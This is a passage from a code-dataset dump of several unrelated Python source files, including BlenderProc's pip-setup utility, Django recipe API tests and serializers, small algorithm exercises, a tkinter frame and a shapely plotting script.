@staticmethod\n    def setup_pip(user_required_packages: Optional[List[str]] = None, blender_path: Optional[str] = None,\n                  major_version: Optional[str] = None, reinstall_packages: bool = False,\n                  use_custom_package_path: bool = True, install_default_packages: bool = True) -> str:\n        \"\"\"\n        Makes sure the given user required and the general required python packages are installed in the BlenderProc env\n\n        At the first run all installed packages are collected via pip freeze.\n        If a pip package is already installed, it is skipped.\n\n        :param user_required_packages: A list of pip packages that should be installed. The version number can be\n                                       specified via the usual == notation.\n        :param blender_path: The path to the blender installation.\n        :param major_version: The version number of the blender installation.\n        :param reinstall_packages: Set to true, if all python packages should be reinstalled.\n        :param use_custom_package_path: If True, the python packages are installed into a custom folder, separate\n                                        from blenders own python packages.\n        :param install_default_packages: If True, general required python packages are made sure to be installed.\n        :return: Returns the path to the directory which contains all custom installed pip packages.\n        \"\"\"\n        required_packages = []\n        # Only install general required packages on first setup_pip call\n        if SetupUtility.installed_packages is None and install_default_packages:\n            required_packages += DefaultConfig.default_pip_packages\n        if user_required_packages is not None:\n            required_packages += user_required_packages\n\n        if reinstall_packages:\n            raise ValueError(\"The reinstall package mode is not supported right now!\")\n\n        result = SetupUtility.determine_python_paths(blender_path, major_version)\n        python_bin, packages_path, packages_import_path, pre_python_package_path = result\n\n        # Init pip\n        SetupUtility._ensure_pip(python_bin, packages_path, packages_import_path, pre_python_package_path)\n\n        # If the list of installed packages was read from cache\n        if SetupUtility.package_list_is_from_cache:\n            # Check if there would be any pip package updates based on the cache\n            found_package_to_install = SetupUtility._pip_install_packages(required_packages, python_bin,\n                                                                          packages_path, dry_run=True)\n            # If yes, reload the list of installed packages\n            if found_package_to_install:\n                SetupUtility._ensure_pip(python_bin, packages_path, packages_import_path,\n                                         pre_python_package_path, force_update=True)\n\n        packages_were_installed = SetupUtility._pip_install_packages(required_packages, python_bin,\n                                                                     packages_path,\n                                                                     use_custom_package_path=use_custom_package_path)\n\n        # Make sure to update the pip package list cache, if it does not exist or changes have been made\n        cache_path = os.path.join(packages_path, \"installed_packages_cache_v2.json\")\n        if packages_were_installed or not os.path.exists(cache_path):\n            with open(cache_path, \"w\", encoding=\"utf-8\") as f:\n                json.dump(SetupUtility.installed_packages, f)\n\n        # If packages were installed, invalidate the module cache, s.t. the new modules can be imported right away\n        if packages_were_installed:\n            importlib.invalidate_caches()\n        return packages_import_path\n\n    
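# Editor's note: the cache written above is a flat name->version JSON dict, e.g.\n    # {\"numpy\": \"1.23.4\", \"h5py\": \"3.7.0\"} (hypothetical versions).\n\n    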
@staticmethod\n    def _pip_install_packages(required_packages, python_bin, packages_path, reinstall_packages: bool = False,\n                              dry_run: bool = False, use_custom_package_path: bool = True) -> bool:\n        \"\"\" Installs the list of given pip packages in the given python environment.\n\n        :param required_packages: A list of pip packages that should be installed. The version number can be\n                                  specified via the usual == notation.\n        :param python_bin: Path to python binary.\n        :param packages_path: Path where our pip packages should be installed\n        :param reinstall_packages: Set to true, if all python packages should be reinstalled.\n        :param dry_run: If true, nothing will be installed, and it will only be checked whether there are\n                        any potential packages to update/install.\n        :param use_custom_package_path: If True, the python packages are installed into a custom folder,\n                                        separate from blenders own python packages.\n        :return: Returns True, if any packages were updated/installed or - if dry_run=True - if there are any potential\n                 packages to update/install.\n        \"\"\"\n        # Install all packages\n        packages_were_installed = False\n        for package in required_packages:\n            # If the required package carries a -f (--find-links) flag, set find_link to the link that follows it\n            find_link = None\n\n            # Extract name and target version\n            if \"==\" in package:\n                package_name, package_version = package.lower().split('==')\n                if ' -f ' in package_version:\n                    find_link = package_version.split(' -f ')[1].strip()\n                    package_version = package_version.split(' -f ')[0].strip()\n            else:\n                package_name, package_version = package.lower(), None\n\n            if package_name == \"opencv-python\":\n                raise RuntimeError(\"Please use opencv-contrib-python instead of opencv-python, as having both \"\n                                   \"packages installed in the same environment can lead to complications.\")\n\n            # If the package is given via git, extract package name from url\n            if package_name.startswith(\"git+\"):\n                # Extract part after last slash\n                package_name = package_name[package_name.rfind(\"/\") + 1:]\n                # Replace underscores with dashes as it's done by pip\n                package_name = package_name.replace(\"_\", \"-\")\n\n            # Check if package is installed\n            # pylint: disable=unsupported-membership-test\n            already_installed = package_name in SetupUtility.installed_packages\n            # pylint: enable=unsupported-membership-test\n\n            # If version check is necessary\n            if package_version is not None and already_installed:\n                # Check if the correct version is installed\n                # pylint: disable=unsubscriptable-object\n                already_installed = package_version == SetupUtility.installed_packages[package_name]\n                # pylint: enable=unsubscriptable-object\n\n            # Only install if it's not already installed (pip would check this itself, but at first downloads the\n            # requested package which of course always takes a while)\n            if not already_installed or reinstall_packages:\n                print(f\"Installing pip package {package_name} {package_version}\")\n                extra_args = []\n                # Set find link flag, if required\n                if find_link:\n                    extra_args.extend([\"-f\", find_link])\n                    package = package_name + \"==\" + package_version\n                # If the env var is set, disable pip cache\n                if os.getenv(\"BLENDER_PROC_NO_PIP_CACHE\", 'False').lower() in ('true', '1', 't'):\n                    extra_args.append(\"--no-cache-dir\")\n\n                if not dry_run:\n                    if use_custom_package_path:\n                        extra_args.extend([\"--user\"])\n                    # Run pip install\n                    # pylint: disable=consider-using-with\n                    subprocess.Popen([python_bin, \"-m\", \"pip\", \"install\", package, \"--upgrade\"] + extra_args,\n                                     env=dict(os.environ, PYTHONNOUSERSITE=\"0\", PYTHONUSERBASE=packages_path)).wait()\n                    # pylint: enable=consider-using-with\n                    # pylint: disable=unsupported-assignment-operation\n                    SetupUtility.installed_packages[package_name] = package_version\n                    # pylint: enable=unsupported-assignment-operation\n                    packages_were_installed = True\n                else:\n                    return True\n\n        return packages_were_installed\n\n    
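# Editor's note -- how the -f notation above is parsed (hypothetical requirement):\n    #   \"torch==1.13.1 -f https://download.pytorch.org/whl/torch_stable.html\"\n    #   -> package_name \"torch\", package_version \"1.13.1\", find_link set to the URL.\n\n    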
@staticmethod\n    def uninstall_pip_packages(package_names: List[str], blender_path: str, major_version: str):\n        \"\"\" Uninstalls the given pip packages in blenders python environment.\n\n        :param package_names: A list of pip packages that should be uninstalled.\n        :param blender_path: The path to the blender main folder.\n        :param major_version: The major version string of the blender installation.\n        \"\"\"\n        # Determine python and packages paths\n        python_bin, _, packages_import_path, _ = SetupUtility.determine_python_paths(blender_path, major_version)\n\n        # Run pip uninstall\n        # pylint: disable=consider-using-with\n        subprocess.Popen([python_bin, \"-m\", \"pip\", \"uninstall\"] + package_names,\n                         env=dict(os.environ, PYTHONPATH=packages_import_path)).wait()\n        # pylint: enable=consider-using-with\n\n        # Clear installed packages cache\n        SetupUtility.clean_installed_packages_cache(blender_path, major_version)\n\n    @staticmethod\n    def _ensure_pip(python_bin: str, packages_path: str, packages_import_path: str,\n                    pre_python_package_path: str, force_update: bool = False):\n        \"\"\" Make sure pip is installed and read in the already installed packages\n\n        :param python_bin: Path to python binary.\n        :param packages_path: Path where our pip packages should be installed\n        :param packages_import_path: Path to site-packages in packages_path which contains the installed packages\n        :param pre_python_package_path: Path that contains blender's default pip packages\n        :param force_update: If True, the installed-packages-cache will be ignored and will be recollected based\n                             on the actually installed packages.\n        \"\"\"\n        if SetupUtility.installed_packages is None:\n            if not force_update:\n                cache_path = os.path.join(packages_path, \"installed_packages_cache_v2.json\")\n                if os.path.exists(cache_path):\n                    with open(cache_path, \"r\", encoding=\"utf-8\") as f:\n                        SetupUtility.installed_packages = json.load(f)\n                    SetupUtility.package_list_is_from_cache = True\n                    return\n\n            SetupUtility.installed_packages = {}\n            # pylint: disable=consider-using-with\n            subprocess.Popen([python_bin, \"-m\", \"ensurepip\"], env=dict(os.environ, PYTHONPATH=\"\")).wait()\n            # Make sure pip is up-to-date\n            subprocess.Popen([python_bin, \"-m\", \"pip\", \"install\", \"--upgrade\", \"pip\"],\n                             env=dict(os.environ, PYTHONPATH=\"\")).wait()\n            # pylint: enable=consider-using-with\n\n            # Make sure to not install into the default site-packages path, as this would overwrite\n            # already pre-installed packages\n            if not os.path.exists(packages_path):\n                os.mkdir(packages_path)\n\n            # Collect already installed packages by calling pip list (outputs lines of the form package==version)\n            installed_packages = subprocess.check_output([python_bin, \"-m\", \"pip\", \"list\", \"--format=freeze\",\n                                                          f\"--path={pre_python_package_path}\"])\n            installed_packages += subprocess.check_output([python_bin, \"-m\", \"pip\", \"list\", \"--format=freeze\",\n                                                           f\"--path={packages_import_path}\"])\n\n            # Split up strings into two lists (names and versions)\n            installed_packages_name, installed_packages_versions = zip(*[str(line).lower().split('==')\n                                                                         for line in installed_packages.splitlines()])\n            installed_packages_name = [ele[2:] if ele.startswith(\"b'\") else ele\n                                       for ele in installed_packages_name]\n            installed_packages_versions = [ele[:-1] if ele.endswith(\"'\") else ele\n                                           for ele in installed_packages_versions]\n            SetupUtility.installed_packages = dict(zip(installed_packages_name, installed_packages_versions))\n            SetupUtility.package_list_is_from_cache = False\n\n    @staticmethod\n    def 
clean_installed_packages_cache(blender_path, major_version):\n \"\"\" Removes the json file containing a list of all installed pip packages (if it exists).\n\n :param blender_path: The path to the blender main folder.\n :param major_version: The major version string of the blender installation.\n \"\"\"\n _, packages_path, _, _ = SetupUtility.determine_python_paths(blender_path, major_version)\n cache_path = os.path.join(packages_path, \"installed_packages_cache_v2.json\")\n if os.path.exists(cache_path):\n os.remove(cache_path)\n\n @staticmethod\n def extract_file(output_dir: str, file: Union[str, BytesIO], mode: str = \"ZIP\"):\n \"\"\" Extract all members from the archive into output_dir.\n\n :param output_dir: The output directory that should contain the extracted files.\n :param file: The path to the archive which should be extracted.\n :param mode: The type of the given file, has to be in [\"TAR\", \"ZIP\"]\n \"\"\"\n try:\n if mode.lower() == \"zip\":\n with zipfile.ZipFile(file) as tar:\n tar.extractall(str(output_dir))\n elif mode.lower() == \"tar\":\n with tarfile.open(file) as tar:\n tar.extractall(str(output_dir))\n else:\n raise RuntimeError(f\"No such mode: {mode}\")\n\n except (IOError, zipfile.BadZipfile) as e:\n print(f\"Bad zip file given as input. {e}\")\n raise e\n\n @staticmethod\n def extract_from_response(output_dir: str, response: requests.Response):\n \"\"\" Extract all members from the archive to output_dir\n\n :param output_dir: the dir to zip file extract to\n :param response: the response to a requested url that contains a zip file\n \"\"\"\n file = BytesIO(response.content)\n SetupUtility.extract_file(output_dir, file)\n\n @staticmethod\n def check_if_setup_utilities_are_at_the_top(path_to_run_file: str):\n \"\"\"\n Checks if the given python scripts has at the top an import to SetupUtility, if not an\n exception is thrown. With an explanation that each python script has to start with SetupUtility.\n\n :param path_to_run_file: path to the used python script\n \"\"\"\n if os.path.exists(path_to_run_file):\n with open(path_to_run_file, \"r\", encoding=\"utf-8\") as file:\n text = file.read()\n lines = [l.strip() for l in text.split(\"\\n\")]\n lines = [l for l in lines if l and not l.startswith(\"#\")]\n for index, line in enumerate(lines):\n if \"import blenderproc\" in line or \"from blenderproc\" in line:\n return\n code = \"\\n\".join(lines[:index + 2])\n raise RuntimeError(f'The given script \"{path_to_run_file}\" does not have a blenderproc '\n f'import at the top! 
Make sure that is the first thing you import, as '\n                                   f'otherwise the import of third-party packages installed in the '\n                                   f'blender environment will fail.\\n'\n                                   f'Your code:\\n#####################\\n{code}\\n\"'\n                                   f'\"####################\\nReplace this with:\\n\"'\n                                   f'\"import blenderproc as bproc\"')\n        else:\n            raise RuntimeError(f\"The given run script does not exist: {path_to_run_file}\")\n\n    @staticmethod\n    def determine_temp_dir(given_temp_dir: str) -> str:\n        \"\"\" Finds and creates a temporary directory.\n\n        On linux the temp dir is per default placed in /dev/shm or /tmp.\n        The name of the created temp dir contains a uuid, so multiple BlenderProc processes\n        can run on one system.\n\n        :param given_temp_dir: A directory inside which the temp dir should be created\n        :return: The path to the created temp dir.\n        \"\"\"\n        # Determine perfect temp dir\n        if given_temp_dir is None:\n            if sys.platform != \"win32\":\n                if os.path.exists(\"/dev/shm\"):\n                    temp_dir = \"/dev/shm\"\n                else:\n                    temp_dir = \"/tmp\"\n            else:\n                temp_dir = os.getenv(\"TEMP\")\n        else:\n            temp_dir = given_temp_dir\n        # Generate unique directory name in temp dir\n        temp_dir = os.path.join(temp_dir, \"blender_proc_\" + str(uuid.uuid4().hex))\n        # Create the temp dir\n        print(\"Using temporary directory: \" + temp_dir)\n        if not os.path.exists(temp_dir):\n            os.makedirs(temp_dir)\n        return temp_dir\n","repo_name":"DLR-RM/BlenderProc","sub_path":"blenderproc/python/utility/SetupUtility.py","file_name":"SetupUtility.py","file_ext":"py","file_size_in_byte":24307,"program_lang":"python","lang":"en","doc_type":"code","stars":2296,"dataset":"github-code","pt":"31"}
{"seq_id":"1328077796","text":"import datetime\n\nfrom reports.models import Report\nfrom rest_framework.serializers import ModelSerializer\n\n\nclass ReportsSerializer(ModelSerializer):\n    class Meta:\n        model = Report\n        exclude = ('is_delete', 'update_time')\n        extra_kwargs = {\n            'html': {\n                'write_only': True,\n            },\n            'create_time': {\n                'read_only': True\n            }\n        }\n\n    def create(self, validated_data):\n        name = validated_data['name']\n        validated_data['name'] = name + '_' + datetime.datetime.now().strftime('%Y%m%d%H%M%S')\n        report = Report.objects.create(**validated_data)\n        report.save()\n        return report\n","repo_name":"DeltaFarce/LaatAPI","sub_path":"apps/reports/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"29028395836","text":"Matrice = []\n\ndef controllaMatriceNonogram(lrighe,lcolonne):\n    m = len(Matrice)\n\n    # Scan the rows\n    for i in range(m):\n        cellerighe = lrighe[i]\n        for j in range(m):\n            if (Matrice[i][j] == 1):\n                cellerighe -= 1\n        \n        if (cellerighe != 0):\n            return False\n\n    # Scan the columns\n    for i in range(m):\n        cellecolonne = lcolonne[i]\n        for j in range(m):\n            if (Matrice[j][i] == 1):\n                cellecolonne -= 1\n        \n        if (cellecolonne != 0):\n            return False\n\n    return True\n    \n\ndef main():\n    n = int(input())\n\n    for i in range(n):\n        riga = []\n        for j in range(n):\n            riga.append(int(input()))\n        Matrice.append(riga)\n\n    ListaNumsColonna = []\n    for i in range(n):\n        ListaNumsColonna.append(int(input()))\n    \n    ListaNumsRiga = []\n    for i in range(n):\n        ListaNumsRiga.append(int(input()))\n\n    if(controllaMatriceNonogram(ListaNumsRiga, ListaNumsColonna)):\n        print(\"SI\", end='')\n    else:\n        print(\"NO\", 
end='')\n\nmain()","repo_name":"gabrielegrillo/Fondamenti1-Unical","sub_path":"E2.py","file_name":"E2.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27329682355","text":"class Solution(object):\n def partition(self, s):\n \"\"\"\n :type s: str\n :rtype: List[List[str]]\n \"\"\"\n if not s:\n return [[]]\n res = []\n for i in range(len(s)):\n if self.recur(s[:i+1]):\n for j in self.partition(s[i+1:]):\n res.append([s[:i+1]]+j)\n return res\n def recur(self,s):\n return s[::-1] == s\n \n #method 2\nclass Solution(object):\n def partition(self, s):\n \"\"\"\n :type s: str\n :rtype: List[List[str]]\n \"\"\"\n n = len(s)\n \n is_palindrome = [[0 for j in xrange(n)] for i in xrange(n)]\n for i in reversed(xrange(0, n)):\n for j in xrange(i, n):\n is_palindrome[i][j] = s[i] == s[j] and ((j - i < 2 ) or is_palindrome[i + 1][j - 1])\n \n sub_partition = [[] for i in xrange(n)]\n for i in reversed(xrange(n)):\n for j in xrange(i, n):\n if is_palindrome[i][j]:\n if j + 1 < n:\n for p in sub_partition[j + 1]:\n sub_partition[i].append([s[i:j + 1]] + p)\n else:\n sub_partition[i].append([s[i:j + 1]])\n \n return sub_partition[0]\n","repo_name":"PrinceNathaniel/leetcode","sub_path":"131Palinddrome-partitioning.py","file_name":"131Palinddrome-partitioning.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"70441682328","text":"#!/usr/bin/env python3\nimport random \n\nanswer = random.randint(1, 100)\ncounter = 0\nwhile True:\n counter += 1\n number = int(input('Please enter a number: '))\n if number < answer:\n print('Please enter bigger number.')\n elif number > answer:\n print('Please enter smaller number.')\n else:\n print('Congratulations!')\n break\nprint('You guessed {} times in total'.format(counter))\nif counter > 7:\n print('Your IQ balance is clearly insufficient')\n","repo_name":"Yao-Phoenix/day_code","sub_path":"_random.py","file_name":"_random.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37922891598","text":"import tkinter as tk\n\nfrom ui.window.main.title.TitleText import TitleText\nfrom ui.consts.ColorConsts import ColorConsts\n\nclass TitleFrame(tk.Frame):\n def __init__(self, window: tk.Tk, master: tk.Widget) -> None:\n super().__init__(\n master,\n background = ColorConsts.MEDIUM_GREY,\n height = 1,\n pady = 25\n )\n self.window = window\n self.text = TitleText(self.window, self)\n self.pack(fill = tk.X)","repo_name":"wjrm500/Pawnfork","sub_path":"ui/window/main/TitleFrame.py","file_name":"TitleFrame.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"75023149846","text":"import model.alpr as alpr\nimport argparse\nimport os\nimport pandas as pd\nimport editdistance\nfrom sklearn.metrics import accuracy_score\n\n#### argument parsing ####\nparser = argparse.ArgumentParser()\nparser.add_argument('--dataPath', required=True, help='path to training dataset')\nparser.add_argument('--savePath', required=True, help='path to save results')\nparser.add_argument('--crnnPath', required=True, help='path to pre-trained CRNN model')\nparser.add_argument('--ctcDecoder', type=str, default='bestPath', \n choices=['bestPath', 'beamSearch'],\n help='method for decoding ctc 
outputs')\n\nparser.add_argument('--normalise', type=bool, default=False, \n help='set true to normalise posterior probability.')\n\nopt = parser.parse_args()\nprint(opt)\n\nif not os.path.exists(opt.savePath):\n os.makedirs(opt.savePath)\n\n\n#### load model ####\nlpr = alpr.AutoLPR(decoder=opt.ctcDecoder, normalise=opt.normalise)\nlpr.load(crnn_path=opt.crnnPath)\n\n\n#### test performance ####\nresult = pd.DataFrame([], columns=['path', 'gTruth', 'pred', 'editDistance'])\n\nfor file in os.listdir(opt.dataPath):\n if file != '.ipynb_checkpoints':\n \n # ground truth\n filename, file_extension = os.path.splitext(file)\n gt = filename.split('_')[-1]\n \n # prediction\n pred = lpr.predict(os.path.join(opt.dataPath, file))\n \n # distance\n dist = editdistance.eval(gt, pred)\n \n result = result.append({'path': file,\n 'gTruth': gt,\n 'pred': pred,\n 'editDistance': dist}, ignore_index=True)\n\n \n#### print and save results ####\nprint(\"Accuracy:\", accuracy_score(result.gTruth, result.pred))\nprint('\\n')\nprint(\"Edit Distance Distribution\")\nprint(result.editDistance.value_counts(sort=False))\n\nresult = result.sort_values(\"editDistance\", ascending=False).reset_index(drop=True)\nresult.to_csv(os.path.join(opt.savePath, 'result.csv'),\n index=False)","repo_name":"kfengtee/crnn-license-plate-OCR","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"36153428425","text":"import tempfile\nimport os\n\nfrom PIL import Image\n\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom django.contrib.auth import get_user_model\n\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom core.models import Recipe, Tag, Ingredient\n\nfrom recipe.serializers import RecipeSerializer, RecipeDetailSerializer\n\n\nRECIPE_URL = reverse('recipe:recipe-list')\n\n\ndef image_upload_url(recipe_id):\n \"\"\"Return URL for recipe image upload\"\"\"\n return reverse('recipe:recipe-upload-image', args=[recipe_id])\n\n\ndef detail_url(recipe_id):\n \"\"\"Return recipe detail URL\"\"\"\n return reverse('recipe:recipe-detail', args=[recipe_id])\n\n\ndef sample_ingredient(user, name='Cinamon'):\n \"\"\"Create and return a sample ingredient\"\"\"\n return Ingredient.objects.create(user=user, name=name)\n\n\ndef sample_tag(user, name='Main course'):\n \"\"\"Create and return a sample tag\"\"\"\n return Tag.objects.create(user=user, name=name)\n\n\ndef sample_recipe(user, **params):\n \"\"\"Create and return a sample recipe\"\"\"\n defaults = {\n 'title': 'Latte',\n 'time_minutes': 10,\n 'price': 5.5\n }\n defaults.update(params)\n\n return Recipe.objects.create(user=user, **defaults)\n\n\nclass PublicRecipeApiTests(TestCase):\n \"\"\"Test the public Recipe APIs\"\"\"\n\n def setUp(self):\n \"\"\"Prepare for the tests\"\"\"\n self.client = APIClient()\n\n def test_login_required(self):\n \"\"\"Test that login is required for Recipe APIs\"\"\"\n res = self.client.get(RECIPE_URL)\n\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateRecipeApiTests(TestCase):\n \"\"\"Test the authorized Recipe APIs\"\"\"\n\n def setUp(self):\n self.client = APIClient()\n self.user = get_user_model().objects.create_user(\n email='test@bocon.cloud',\n password='testPass',\n name='Test'\n )\n self.client.force_authenticate(user=self.user)\n\n def test_list_recipes_success(self):\n \"\"\"Test that retrieving list of recipes 
success\"\"\"\n sample_recipe(user=self.user)\n sample_recipe(user=self.user)\n\n res = self.client.get(RECIPE_URL)\n\n recipes = Recipe.objects.all().order_by('-id')\n serializer = RecipeSerializer(recipes, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data, serializer.data)\n\n def test_limited_recipe_for_authen_user_only(self):\n \"\"\"Test that only retrieve recipes of authenticated user\"\"\"\n user2 = get_user_model().objects.create_user(\n email='test2@bocon.cloud',\n password='testPass2',\n name='Test2'\n )\n\n sample_recipe(user=self.user)\n sample_recipe(user=user2)\n\n res = self.client.get(RECIPE_URL)\n\n recipes = Recipe.objects.filter(user=self.user).order_by('-id')\n serializer = RecipeSerializer(recipes, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data, serializer.data)\n\n def test_view_recipe_detail(self):\n \"\"\"Test viewing a recipe detail\"\"\"\n recipe = sample_recipe(user=self.user)\n recipe.tags.add(sample_tag(user=self.user))\n recipe.ingredients.add(sample_ingredient(user=self.user))\n\n url = detail_url(recipe_id=recipe.id)\n res = self.client.get(url)\n\n serializer = RecipeDetailSerializer(recipe)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data, serializer.data)\n\n def test_create_basic_recipe(self):\n \"\"\"Test that create basic recipe\"\"\"\n payload = {\n 'title': 'Cappucino',\n 'time_minutes': 30,\n 'price': 25.5\n }\n\n res = self.client.post(RECIPE_URL, payload)\n\n recipe = Recipe.objects.get(id=res.data['id'])\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n\n for key in payload.keys():\n self.assertEqual(payload[key], getattr(recipe, key))\n\n def test_create_recipe_with_tags(self):\n \"\"\"Test creating a recipe with tags\"\"\"\n tag1 = sample_tag(user=self.user, name='Breakfast')\n tag2 = sample_tag(user=self.user, name='Caffein')\n payload = {\n 'title': 'Cappucino',\n 'time_minutes': 10,\n 'price': 20.5,\n 'tags': [tag1.id, tag2.id]\n }\n\n res = self.client.post(RECIPE_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n recipe = Recipe.objects.get(id=res.data['id'])\n tags = recipe.tags.all()\n\n self.assertEqual(tags.count(), 2)\n self.assertIn(tag1, tags)\n self.assertIn(tag2, tags)\n\n def test_create_recipe_with_ingredients(self):\n \"\"\"Test creating recipe with ingredients\"\"\"\n ingred1 = sample_ingredient(user=self.user, name='Milk')\n ingred2 = sample_ingredient(user=self.user, name='Coffee')\n payload = {\n 'title': 'Cappucino',\n 'ingredients': [ingred1.id, ingred2.id],\n 'time_minutes': 10,\n 'price': 15\n }\n\n res = self.client.post(RECIPE_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n\n recipe = Recipe.objects.get(id=res.data['id'])\n ingreds = recipe.ingredients.all()\n\n self.assertIn(ingred1, ingreds)\n self.assertIn(ingred2, ingreds)\n\n\nclass RecipeImageUploadTests(TestCase):\n\n def setUp(self):\n self.client = APIClient()\n self.user = get_user_model().objects.create_user(\n email='test@bocon.cloud',\n password='testPass',\n name='Test'\n )\n self.client.force_authenticate(self.user)\n self.recipe = sample_recipe(user=self.user)\n\n def tearDown(self):\n self.recipe.image.delete()\n\n def test_upload_image_to_recipe(self):\n \"\"\"Test uploading an image to recipe\"\"\"\n url = image_upload_url(self.recipe.id)\n with tempfile.NamedTemporaryFile(suffix='.jpg') as ntf:\n img = 
Image.new('RGB', (10, 10))\n img.save(ntf, format='JPEG')\n ntf.seek(0)\n\n res = self.client.post(url, {'image': ntf}, format='multipart')\n\n self.recipe.refresh_from_db()\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertIn('image', res.data)\n self.assertTrue(os.path.exists(self.recipe.image.path))\n\n def test_upload_image_bad_request(self):\n \"\"\"Test upload invalid image\"\"\"\n url = image_upload_url(self.recipe.id)\n res = self.client.post(url, {\n 'image': 'notimage'\n }, format='multipart')\n\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_filter_recipe_by_tags(self):\n \"\"\"Test returning recipes with specific tags\"\"\"\n recipe1 = sample_recipe(user=self.user,\n title='Thai_vegetable_curr')\n recipe2 = sample_recipe(user=self.user,\n title='Aubegine_with_tahin')\n tag1 = sample_tag(user=self.user, name='Vegan')\n tag2 = sample_tag(user=self.user, name='Vegeterian')\n recipe1.tags.add(tag1)\n recipe2.tags.add(tag2)\n\n recipe3 = sample_recipe(user=self.user, title='Fish and chips')\n\n res = self.client.get(\n RECIPE_URL,\n {\n 'tags': f'{tag1.id},{tag2.id}'\n }\n )\n\n serializer1 = RecipeSerializer(recipe1)\n serializer2 = RecipeSerializer(recipe2)\n serializer3 = RecipeSerializer(recipe3)\n\n self.assertIn(serializer1.data, res.data)\n self.assertIn(serializer2.data, res.data)\n self.assertNotIn(serializer3.data, res.data)\n\n def test_filter_recipes_by_ingredients(self):\n \"\"\"Test returning recipes with specific ingredients\"\"\"\n recipe1 = sample_recipe(user=self.user, title='Beans on toast')\n recipe2 = sample_recipe(user=self.user, title='Chicken roasted')\n\n ingredient1 = sample_ingredient(user=self.user, name='Peta cheese')\n ingredient2 = sample_ingredient(user=self.user, name='Chicken')\n\n recipe1.ingredients.add(ingredient1)\n recipe2.ingredients.add(ingredient2)\n\n recipe3 = sample_recipe(user=self.user, title='Steak and mushroom')\n\n res = self.client.get(\n RECIPE_URL,\n {'ingredients': f'{ingredient1.id},{ingredient2.id}'}\n )\n\n serializer1 = RecipeSerializer(recipe1)\n serializer2 = RecipeSerializer(recipe2)\n serializer3 = RecipeSerializer(recipe3)\n\n self.assertIn(serializer1.data, res.data)\n self.assertIn(serializer2.data, res.data)\n self.assertNotIn(serializer3.data, res.data)\n","repo_name":"boconlonton/recipe-app-api-deepdive","sub_path":"app/recipe/tests/test_recipes_api.py","file_name":"test_recipes_api.py","file_ext":"py","file_size_in_byte":8837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20423922515","text":"'''\nFrom shapely respo.\n'''\n\nfrom matplotlib import pyplot\nfrom shapely.geometry import Point\nfrom descartes import PolygonPatch\nfrom matplotlib.font_manager import FontProperties\n\nfont_song = FontProperties(fname=\"/usr/share/fonts/xpfonts/simfang.ttf\")\nfrom figures import SIZE, BLUE, GRAY, set_limits, WHITE, BLACK\n\nfig = pyplot.figure(1, figsize=SIZE, dpi=90)\n\na = Point(1, 1).buffer(1.5)\nb = Point(2, 1).buffer(1.5)\n\n# 1\nax = fig.add_subplot(121)\n\npatch1 = PolygonPatch(a, fc=WHITE, ec=BLACK, alpha=0.2, zorder=1)\nax.add_patch(patch1)\npatch2 = PolygonPatch(b, fc=WHITE, ec=BLACK, alpha=0.2, zorder=1)\nax.add_patch(patch2)\nc = a.intersection(b)\npatchc = PolygonPatch(c, fc=GRAY, ec=GRAY, alpha=0.5, zorder=2)\nax.add_patch(patchc)\n\nax.set_title('a.intersection(b)')\n\nset_limits(ax, -1, 4, -1, 3)\n\n# 2\nax = fig.add_subplot(122)\n\npatch1 = PolygonPatch(a, fc=WHITE, ec=BLACK, alpha=0.2, 
zorder=1)\nax.add_patch(patch1)\npatch2 = PolygonPatch(b, fc=WHITE, ec=BLACK, alpha=0.2, zorder=1)\nax.add_patch(patch2)\nc = a.symmetric_difference(b)\n\nif c.geom_type == 'Polygon':\n patchc = PolygonPatch(c, fc=GRAY, ec=GRAY, alpha=0.5, zorder=2)\n ax.add_patch(patchc)\nelif c.geom_type == 'MultiPolygon':\n for p in c:\n patchp = PolygonPatch(p, fc=GRAY, ec=GRAY, alpha=0.5, zorder=2)\n ax.add_patch(patchp)\n\nax.set_title('a.symmetric_difference(b)')\n\nset_limits(ax, -1, 4, -1, 3)\n\n# pyplot.show()\n\nimport os\n\nplt = pyplot\n\nplt.savefig(os.path.join(os.path.split(os.path.realpath(__file__))[0],\n 'xx{bname}.pdf'.format(\n bname=os.path.splitext(os.path.basename(__file__))[0][4:]\n )\n ), bbox_inches='tight')\n\nplt.savefig(os.path.join(os.path.split(os.path.realpath(__file__))[0],\n 'xx{bname}.png'.format(\n bname=os.path.splitext(os.path.basename(__file__))[0][4:]\n )\n ), bbox_inches='tight')\n\npyplot.clf()\n","repo_name":"bukun/book_python_gis","sub_path":"part010/ch05_shapely/sec4_spatial_analysis/test_fig_intersection-sym-difference.py","file_name":"test_fig_intersection-sym-difference.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":180,"dataset":"github-code","pt":"31"} +{"seq_id":"14574842918","text":"from datetime import datetime\n\ndef 